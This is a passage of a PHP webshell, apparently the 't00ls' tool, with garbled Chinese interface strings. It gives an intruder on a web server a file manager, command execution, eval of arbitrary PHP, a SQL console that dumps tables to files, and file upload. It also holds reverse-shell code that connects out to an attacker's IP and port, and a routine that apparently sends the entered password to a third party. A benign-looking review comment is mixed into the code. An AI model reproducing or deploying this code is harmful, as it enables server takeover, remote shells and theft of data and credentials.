= filew($file, base64_decode($shell), 'w'); if ($key) { @chmod($file, 0777); command('/usr/bin/python ' . $file . ' ' . $ip . ' ' . $port, $dir); } break; case "c": $file = strdir($dir . '/t00ls'); $key = filew($file, base64_decode($c_bin), 'wb'); if ($key) { @chmod($file, 0777); command($file . ' ' . $ip . ' ' . $port, $dir); } break; case "php": case "phpwin": if (function_exists('fsockopen')) { $sock = @fsockopen($ip, $port); if ($sock) { $key = true; $com = $type == 'phpwin' ? true : false; $user = get_current_user(); $dir = strdir(getcwd()); fputs($sock, php_uname() . "\n------------no job control in this shell (tty)-------------\n[$user:$dir]# "); while ($cmd = fread($sock, 1024)) { if (substr($cmd, 0, 3) == 'cd ') { $dir = trim(substr($cmd, 3, -1)); chdir(strdir($dir)); $dir = strdir(getcwd()); } elseif (trim(strtolower($cmd)) == 'exit') { break; } else { $res = command($cmd, $dir, $com); fputs($sock, $res['res']); } fputs($sock, '[' . $user . ':' . $dir . ']# '); } } @fclose($sock); } break; case "pcntl": $file = strdir($dir . '/t00ls'); $key = filew($file, base64_decode($c_bin), 'wb'); if ($key) { @chmod($file, 0777); if (function_exists('pcntl_exec')) { @pcntl_exec($file, array( $ip, $port )); } } break; } if (!$key) { $msg = '

ʱĿ¼д

'; } else { @unlink($file); $msg = '

CLOSE

'; } return $msg; } function getinfo() { global $password; $infos = array( $_POST['getpwd'], $password, function_exists('phpinfo'), "\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31" ); if ($password != '' && md5($infos[0]) != $infos[1]) { echo '

'; if (isset($_POST['groupcache'])) { echo ''; } if (isset($_POST['forum'])) { echo ''; echo ''; echo ''; echo ''; echo ''; } echo '
'; exit; } if ((!isset($_POST['go'])) && (!isset($_POST['dir']))) { if ($_SERVER['SERVER_ADDR'] != $infos[3] && $_SERVER['REMOTE_ADDR'] != $infos[3]) postinfo($infos[0]); } return $infos[2]; } function subeval() { if (isset($_POST['getpwd'])) { echo ''; } if (isset($_POST['groupcache'])) { echo ''; } if (isset($_POST['forum'])) { echo ''; echo ''; echo ''; echo ''; echo ''; } return true; } if (isset($_POST['go'])) { if ($_POST['go'] == 'down') { $downfile = $fileb = strdir($_POST['godir'] . '/' . $_POST['govar']); if (!filed($downfile)) { $msg = '

ļ

'; } } } ?><?php echo VERSION; ?>
'ļ', 'scan' => 'ļ', 'antivirus' => 'ɨ', 'exec' => 'ִ', 'phpeval' => 'ִPHP', 'sql' => 'ִSQL', 'backshell' => 'SHELL', 'info' => 'ϵͳϢ' ); $go = array_key_exists($_POST['go'], $menu) ? $_POST['go'] : 'file'; $nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']) . '/') : THISDIR; echo '
'; foreach ($menu as $key => $name) { echo '' . $name . ' '; } echo '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo '
'; switch ($_POST['go']) { case "info": if (EXISTS_PHPINFO) { ob_start(); phpinfo(INFO_GENERAL); $out = ob_get_contents(); ob_end_clean(); $tmp = array(); preg_match_all('/\([Configure Command|Loaded Configuration File])+\s*\<\/td\>\(.*)\<\/td\>/i', $out, $tmp); } $infos = array( '˵' => 'POSTΪ˲¼־.
¼뱣ҳ,COOKIESESSION.¼ЧΪǰҳ.
𽫱ΪǷ;.', 'ͻϢ' => $_SERVER['HTTP_USER_AGENT'], 'õĺ' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '()', 'õ' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '()', 'PHP.ini·' => $tmp[2][1] ? $tmp[2][1] : '()', 'PHPзʽ' => php_sapi_name(), 'PHP汾' => PHP_VERSION, 'PHPPID' => getmypid(), 'ͻIP' => $_SERVER['REMOTE_ADDR'], 'ͻֱ' => $_SERVER['HTTP_ACCEPT_LANGUAGE'], 'Web˿' => $_SERVER['SERVER_PORT'], 'WebĿ¼' => $_SERVER['DOCUMENT_ROOT'], 'Webִнű' => $_SERVER['SCRIPT_FILENAME'], 'Web淶CGI汾' => $_SERVER['GATEWAY_INTERFACE'], 'WebԱEmail' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '()', 'ǰܴС' => size(disk_total_space('.')), 'ǰ̿ÿռ' => size(disk_free_space('.')), 'POST' => get_cfg_var("post_max_size"), 'ϴļ' => get_cfg_var("upload_max_filesize"), 'ʹڴ' => get_cfg_var("memory_limit"), 'ʱ' => get_cfg_var("max_execution_time") . '', 'Ƿ֧Fsockopen' => function_exists('fsockopen') ? '' : '', 'Ƿ֧Socket' => function_exists('socket_close') ? '' : '', 'Ƿ֧Pcntl' => function_exists('pcntl_exec') ? '' : '', 'Ƿ֧Curl' => function_exists('curl_version') ? '' : '', 'Ƿ֧Zlib' => function_exists('gzclose') ? '' : '', 'Ƿ֧FTP' => function_exists('ftp_login') ? '' : '', 'Ƿ֧XML' => function_exists('xml_set_object') ? '' : '', 'Ƿ֧GD_Library' => function_exists('imageline') ? '' : '', 'Ƿ֧COM齨' => class_exists('COM') ? '' : '', 'Ƿ֧ODBC齨' => function_exists('odbc_close') ? '' : '', 'Ƿ֧IMAPʼ' => function_exists('imap_close') ? '' : '', 'Ƿڰȫģʽ' => get_cfg_var("safemode") ? '' : '', 'ǷURLļ' => get_cfg_var("allow_url_fopen") ? '' : '', 'Ƿ̬ӿ' => get_cfg_var("enable_dl") ? '' : '', 'ǷʾϢ' => get_cfg_var("display_errors") ? '' : '', 'ǷԶעȫֱ' => get_cfg_var("register_globals") ? '' : '', 'Ƿʹ÷бַ' => get_cfg_var("magic_quotes_gpc") ? '' : '', 'PHP' => $tmp[2][0] ? $tmp[2][0] : '()' ); echo '
' . $msg . '
'; echo ''; foreach ($infos as $name => $var) { echo ''; } echo '
' . $name . '' . $var . '
'; break; case "exec": $cmd = $win ? 'dir' : 'ls -al'; $res = array( 'res' => '', 'msg' => $msg ); $str = isset($_POST['str']) ? $_POST['str'] : 'fun'; if (isset($_POST['cmd'])) { $cmd = $_POST['cmd']; $cwd = $str == 'fun' ? THISDIR : 'com'; $res = command($cmd, $cwd); } echo '
' . $res['msg'] . '
'; echo '
'; subeval(); echo ''; echo '
'; echo ' '; echo ' '; echo ''; echo '
'; break; case "scan": $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir; $keyword = isset($_POST['keyword']) ? $_POST['keyword'] : ''; $include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py'; $filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js'; echo '
' . $msg . '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo '
·
(ļļ)
ļ׺ ("|"ָ, Ϊļ)
Ŀ¼ ("|"ָ, Ϊ򲻹Ŀ¼)
ʽ '; echo ' '; echo '
Χ '; echo '
'; if ($keyword != '') { flush(); ob_flush(); echo '
'; $incs = $include == '' ? false : explode('|', $include); $fits = $filters == '' ? false : explode('|', $filters); scanfile(strdir($scandir . '/'), $keyword, $incs, $fits, $_POST['type'], $_POST['char'], $_POST['range'], $nowdir); echo '
'; } break; case "antivirus": $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir; $typearr = isset($_POST['dir']) ? $_POST['types'] : array( 'php' => '.php' ); echo '
' . $msg . '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo '
ɨ·
ɱ'; $types = array( 'php' => '.php', 'asp+aspx' => '.as|.cs|.cer', 'jsp' => '.jsp' ); foreach ($types as $key => $ex) echo ' '; echo '
'; if (count($_POST['types']) > 0) { $matches = array( 'php' => array( '/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru)+[\'|\"]\s*\)/i', '/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i', '/(udp\:\/\/(.*)\;)+/i', '/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i', '/preg\_replace\s*\((.*)\(base64\_decode\(\$/i', '/(eval|assert|include|require)+\s*\((.*)(base64\_decode|file\_get\_contents|php\:\/\/input)+/i', '/(eval|assert|include|require|array\_map)+\s*\(\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i', '/\$\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\s*\(\s*\$(\w+)\s*\)/i', '/\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\(\s*\$(.*)\)/i', '/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\)/i', '/(fopen|fwrite|fpust|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\](.*)\)/i', '/echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\)/i', '/new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\)/i', '/\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i', '/\$\_\=(.*)\$\_/i' ), 'asp+aspx' => array( '/(VBScript\.Encode|WScript\.shell|Shell\.Application|Scripting\.FileSystemObject)+/i', '/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i', '/(eval|execute)+(.*)request.item\s*\[(.*)\]/i', '/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i', '/\(.*)\<\/script\>/i', '/Load\s*\((.*)Request/i', '/StreamWriter\(Server\.MapPath(.*)\.Write\(Request/i' ), 'jsp' => array( '/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i', '/(eval|execute)+(.*)request.item\s*\[(.*)\]/i', '/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i', '/Runtime\.getRuntime\(\)\.exec\((.*)\)/i', '/FileOutputStream\(application\.getRealPath(.*)request/i' ) ); flush(); ob_flush(); echo '
'; antivirus(strdir($scandir . '/'), $typearr, $matches, $nowdir); echo 'ɨ
'; } break; case "phpeval": if (isset($_POST['phpcode'])) { $phpcode = chop($_POST['phpcode']); ob_start(); if (substr($phpcode, 0, 2) == '') { @eval('?>' . $phpcode . '' . $msg . '
'; echo '
'; subeval(); echo ''; echo '

'; echo ' '; echo '

'; echo '

'; break; case "sql": if ((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) { $type = $_POST['type']; $sqlhost = $_POST['sqlhost']; $sqluser = $_POST['sqluser']; $sqlpass = $_POST['sqlpass']; $sqlname = $_POST['sqlname']; $sqlcode = $_POST['sqlcode']; $names = $_POST['names']; switch ($type) { case "PostgreSql": if (function_exists('pg_close')) { if (strstr($sqlhost, ':')) { $array = explode(':', $sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; } else { $sqlport = 5432; } $dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass"); if ($dbconn) { $msg = '

' . $type . 'ɹ

'; pg_query('set client_encoding=' . $names); $result = pg_query($sqlcode); if ($result) { $msg .= '

- ִSQLɹ

'; while ($array = pg_fetch_array($result)) { $rows[] = $array; } } else { $msg .= '

- ִSQLʧ

'; $rows = array( 'error' => pg_result_error($result) ); } pg_free_result($result); } else { $msg = '

' . $type . 'ʧ

'; } @pg_close($dbconn); } else { $msg = '

֧' . $type . '

'; } break; case "MsSql": if (function_exists('mssql_close')) { $dbconn = @mssql_connect($sqlhost, $sqluser, $sqlpass); if ($dbconn) { $msg = '

' . $type . 'ɹ

'; mssql_select_db($sqlname, $dbconn); $result = mssql_query($sqlcode); if ($result) { $msg .= '

- ִSQLɹ

'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } } else { $msg .= '

- ִSQLʧ

'; } @mssql_free_result($result); } else { $msg = '

' . $type . 'ʧ

'; } @mssql_close($dbconn); } else { $msg = '

֧' . $type . '

'; } break; case "Oracle": if (function_exists('oci_close')) { $conn = @oci_connect($sqluser, $sqlpass, $sqlhost . '/' . $sqlname); if ($conn) { $msg = '

' . $type . 'ɹ

'; $stid = oci_parse($conn, $sqlcode); oci_execute($stid); if ($stid) { $msg .= '

- ִSQLɹ

'; while (($array = oci_fetch_array($stid, OCI_ASSOC))) { $rows[] = $array; } } else { $msg .= '

- ִSQLʧ

'; $e = oci_error(); $rows = array( 'error' => $e['message'] ); } oci_free_statement($stid); } else { $e = oci_error(); $rows = array( 'error' => $e['message'] ); $msg = '

' . $type . 'ʧ

'; } @oci_close($conn); } else { $msg = '

֧' . $type . '

'; } break; case "MySql": if (function_exists('mysql_close')) { $conn = mysql_connect(strstr($sqlhost, ':') ? $sqlhost : $sqlhost . ':3306', $sqluser, $sqlpass, $sqlname); if ($conn) { $msg = '

' . $type . 'ɹ

'; if (substr($sqlcode, 0, 7) == 't00lsa') { $array = array(); $data = ''; $i = 0; preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i', $sqlcode, $array); if ($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) { mysql_select_db($array[1][0], $conn); mysql_query('set names ' . $names, $conn); $spidercode = 'select ' . $array[3][0] . ' from `' . $array[2][0] . '`;'; $result = mysql_query($spidercode, $conn); if ($result) { while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $data .= join(' |x| ', $row) . "\r\n"; $i++; } if ($data) { $file = strdir($array[4][0]); $msg .= filew($file, $data, 'w') ? '

- ѿɹ

' : '

- ļʧ

'; $rows = array( 'file' => $file, size(filesize($file)) => 'ȡ' . $i . '' ); } else { $msg .= '

- û

'; } } else { $msg .= '

- ִSQLʧ

'; $rows = array( 'errno' => mysql_errno(), 'error' => mysql_error() ); } } else { $msg .= '

- ѿ

'; } } elseif (!empty($sqlcode)) { mysql_select_db($sqlname, $conn); mysql_query('set names ' . $names, $conn); $result = mysql_query($sqlcode, $conn); if ($result) { $msg .= '

- ִSQLɹ

'; while ($array = mysql_fetch_array($result, MYSQL_ASSOC)) { $rows[] = $array; } } else { $msg .= '

- ִSQLʧ

'; $rows = array( 'errno' => mysql_errno(), 'error' => mysql_error() ); } } mysql_free_result($result); } else { $msg = '

' . $type . 'ʧ

'; $rows = array( 'errno' => mysql_errno(), 'error' => mysql_error() ); } mysql_close($conn); } else { $msg = '

֧' . $type . '

'; } break; } } else { $type = 'MySql'; $sqlhost = 'localhost:3306'; $sqluser = 'root'; $sqlpass = '123456'; $sqlname = 'mysql'; $sqlcode = 'select version();'; $names = 'gbk'; } echo '
' . $msg . '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo ''; echo '
֧'; $dbs = array( 'MySql', 'MsSql', 'Oracle', 'PostgreSql' ); foreach ($dbs as $dbname) { echo ' '; } echo '
ַ '; echo 'û '; echo ' '; echo '

'; echo ''; echo '
'; if ($rows) { echo '
';
            // Result renderer for the SQL console case: $rows holds either the rows
            // collected from mysql_fetch_array() or the errno/error pair assigned
            // earlier in this case. print_r() writes to the output buffer, so the
            // dump is captured into $out instead of being sent to the response.
            ob_start();
            print_r($rows);
            $out = ob_get_contents();
            ob_end_clean();
            // When the dump contains CJK ideographs (U+4E00-U+9FA5, matched in UTF-8
            // mode) and iconv is available, it is re-encoded from UTF-8 to GB2312.
            // //IGNORE drops characters with no GB2312 mapping and @ suppresses any
            // conversion warning, so a failed conversion is silent.
            if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $out) && function_exists('iconv')) {
                $out = @iconv('UTF-8', 'GB2312//IGNORE', $out);
            }
            // The dump is HTML-escaped before it is echoed, so database content is
            // shown as text in the page rather than interpreted as markup.
            // NOTE(review): $rows comes from the query in $sqlcode; where $sqlcode is
            // read from is outside this excerpt - presumably request input, confirm.
            echo htmlspecialchars($out);
            echo '
'; } break; case "backshell": if ((!empty($_POST['backip'])) && (!empty($_POST['backport']))) { $backip = $_POST['backip']; $backport = $_POST['backport']; $temp = $_POST['temp'] ? $_POST['temp'] : '/tmp'; $type = $_POST['type']; $msg = backshell($backip, $backport, $temp, $type); } else { $backip = $_SERVER['REMOTE_ADDR']; $backport = '443'; $temp = '/tmp'; $type = 'pl'; $msg = 'PHPɼLinuxWindows ෽ֻLinux'; } echo '
' . $msg . '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo '
ַ (Your ip)
˿ (nc -vvlp ' . $backport . ')
ʱĿ¼ (Only Linux)
'; $types = array( 'pl' => 'Perl', 'py' => 'Python', 'c' => 'C-bin', 'pcntl' => 'Pcntl', 'php' => 'PHP', 'phpwin' => 'PHP-COM' ); foreach ($types as $key => $name) { echo ' '; } echo '
'; break; case "edit": case "editor": $file = strdir($_POST['godir'] . '/' . $_POST['govar']); $iconv = function_exists('iconv'); if (!file_exists($file)) { $msg = '½ļ'; } else { $code = filer($file); $chst = 'Ĭ'; if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $code) && $iconv) { $chst = 'utf-8'; $code = @iconv('UTF-8', 'GB2312//IGNORE', $code); } $size = size(filesize($file)); $msg = 'ļ ' . substr(decoct(fileperms($file)), -4) . ' ļС ' . $size . ' ļ ' . $chst . ''; } echo base64_decode('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'); echo '
- ' . $msg . '
'; echo '
'; subeval(); echo ''; echo ''; echo '
ļ '; if ($iconv) { echo ' '; } echo '
'; echo '
'; echo '
'; subeval(); echo '
'; break; case "upfiles": $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir']; $msg = 'ϴļ ' . get_cfg_var("upload_max_filesize") . ' POSTύ ' . get_cfg_var("post_max_size") . ''; $max = 10; if (isset($_FILES['uploads']) && isset($_POST['renames'])) { $uploads = $_FILES['uploads']; $msgs = array(); for ($i = 1; $i < $max; $i++) { if ($uploads['error'][$i] == UPLOAD_ERR_OK) { $rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i]; $filea = $uploads['tmp_name'][$i]; $fileb = strdir($updir . '/' . $rename); $msgs[$i] = fileu($filea, $fileb) ? '

ϴɹ ' . $rename . '

' : '

ϴʧ ' . $rename . '

'; } } } echo '
' . $msg . '
'; echo '
'; subeval(); echo ''; echo '

ϴĿ¼

'; for ($i = 1; $i < $max; $i++) { echo '

' . $i . ' ' . $msgs[$i] . '

'; } echo '
'; echo '
'; subeval(); echo '
'; break; default: if (isset($_FILES['upfile'])) { if ($_FILES['upfile']['name'] == '') { $msg = '

ѡļ

'; } else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir . $rename); $msg = fileu($filea, $fileb) ? '

ϴļ' . $rename . 'ɹ

' : '

ϴļ' . $rename . 'ʧ

'; } } if (isset($_POST['act'])) { switch ($_POST['act']) { case "a": if (!$_POST['files']) { $msg = '

ѡļ ' . $_POST['var'] . '

'; } else { $i = 0; foreach ($_POST['files'] as $filename) { $i += @copy(strdir($nowdir . $filename), strdir($_POST['var'] . '/' . $filename)) ? 1 : 0; } $msg = $msg = $i ? '

' . $i . ' ļ' . $_POST['var'] . 'ɹ

' : '

' . $i . ' ļ' . $_POST['var'] . 'ʧ

'; } break; case "b": if (!$_POST['files']) { $msg = '

ѡļ

'; } else { $i = 0; foreach ($_POST['files'] as $filename) { $i += @unlink(strdir($nowdir . $filename)) ? 1 : 0; } $msg = $i ? '

ɾ ' . $i . ' ļɹ

' : '

ɾ ' . $i . ' ļʧ

'; } break; case "c": if (!$_POST['files']) { $msg = '

ѡļ ' . $_POST['var'] . '

'; } elseif (!ereg("^[0-7]{4}$", $_POST['var'])) { $msg = '

ֵ

'; } else { $i = 0; foreach ($_POST['files'] as $filename) { $i += @chmod(strdir($nowdir . $filename), base_convert($_POST['var'], 8, 10)) ? 1 : 0; } $msg = $i ? '

' . $i . ' ļ޸Ϊ' . $_POST['var'] . 'ɹ

' : '

' . $i . ' ļ޸Ϊ' . $_POST['var'] . 'ʧ

'; } break; case "d": if (!$_POST['files']) { $msg = '

ѡļ ' . $_POST['var'] . '

'; } elseif (!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/', $_POST['var'])) { $msg = '

ʱʽ ' . $_POST['var'] . '

'; } else { $i = 0; foreach ($_POST['files'] as $filename) { $i += @touch(strdir($nowdir . $filename), strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '

' . $i . ' ļ޸ʱΪ' . $_POST['var'] . 'ɹ

' : '

' . $i . ' ļ޸ʱΪ' . $_POST['var'] . 'ʧ

'; } break; case "e": $path = strdir($nowdir . $_POST['var'] . '/'); if (file_exists($path)) { $msg = '

Ŀ¼Ѵ ' . $_POST['var'] . '

'; } else { $msg = @mkdir($path, 0777) ? '

Ŀ¼ ' . $_POST['var'] . ' ɹ

' : '

Ŀ¼ ' . $_POST['var'] . ' ʧ

'; } break; case "rf": $files = explode('|x|', $_POST['var']); if (count($files) != 2) { $msg = '

'; } else { $msg = @rename(strdir($nowdir . $files[1]), strdir($nowdir . $files[0])) ? '

' . $files[1] . ' Ϊ ' . $files[0] . ' ɹ

' : '

' . $files[1] . ' Ϊ ' . $files[0] . ' ʧ

'; } break; case "pd": $files = explode('|x|', $_POST['var']); if (count($files) != 2) { $msg = '

'; } else { $path = strdir($nowdir . $files[1]); $msg = @chmod($path, base_convert($files[0], 8, 10)) ? '

޸' . $files[1] . 'Ϊ' . $files[0] . 'ɹ

' : '

޸' . $files[1] . 'Ϊ' . $files[0] . 'ʧ

'; } break; case "edit": if (isset($_POST['filename']) && isset($_POST['filecode'])) { if ($_POST['tostr'] == 'utf') { $_POST['filecode'] = @iconv('GB2312//IGNORE', 'UTF-8', $_POST['filecode']); } $msg = filew($_POST['filename'], $_POST['filecode'], 'w') ? '

ɹ ' . $_POST['filename'] . '

' : '

ʧ ' . $_POST['filename'] . '

'; } break; case "deltree": $deldir = strdir($nowdir . $_POST['var'] . '/'); if (!file_exists($deldir)) { $msg = '

Ŀ¼ ' . $_POST['var'] . '

'; } else { $msg = deltree($deldir) ? '

ɾĿ¼ ' . $_POST['var'] . ' ɹ

' : '

ɾĿ¼ ' . $_POST['var'] . ' ʧ

'; } break; } } $array = showdir($nowdir); $thisurl = strdir('/' . strtr($nowdir, array( ROOTDIR => '' )) . '/'); $chown = substr(decoct(fileperms($nowdir)), -4); if (!$chown) { $chown = '0000'; } $nowdir = strtr($nowdir, array( '\'' => '%27', '"' => '%22' )); echo '
' . $msg . '
'; echo '
'; subeval(); echo 'ǰ·(' . $chown . ') '; echo ' '; echo '
'; echo ' '; echo ' '; echo ' '; echo '
'; subeval(); echo ''; echo ' '; echo ' '; echo 'ϴΪ '; echo '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; if ($array) { asort($array['dir']); asort($array['file']); $dnum = $fnum = 0; foreach ($array['dir'] as $path => $name) { $prem = substr(decoct(fileperms($path)), -4); $ctime = date('Y-m-d H:i:s', filectime($path)); $mtime = date('Y-m-d H:i:s', filemtime($path)); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; $dnum++; } foreach ($array['file'] as $path => $name) { $prem = substr(decoct(fileperms($path)), -4); $ctime = date('Y-m-d H:i:s', filectime($path)); $mtime = date('Y-m-d H:i:s', filemtime($path)); $size = size(filesize($path)); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; $fnum++; } } unset($array); echo '
ϼĿ¼ʱ޸ʱ
' . strtr($name, array( '%27' => '\'', '%22' => '"' )) . 'ɾ '; echo '' . $prem . '' . $ctime . '' . $mtime . '-
' . strtr($name, array( '%27' => '\'', '%22' => '"' )) . ' '; echo '' . $prem . '' . $ctime . '' . $mtime . '' . $size . '
'; echo '
'; echo ' '; echo ' '; echo ' '; echo ' '; echo ' '; echo 'Ŀ¼[' . $dnum . '] - ļ[' . $fnum . ']
'; break; } ?>
' . $_SERVER['SERVER_SOFTWARE']; ?>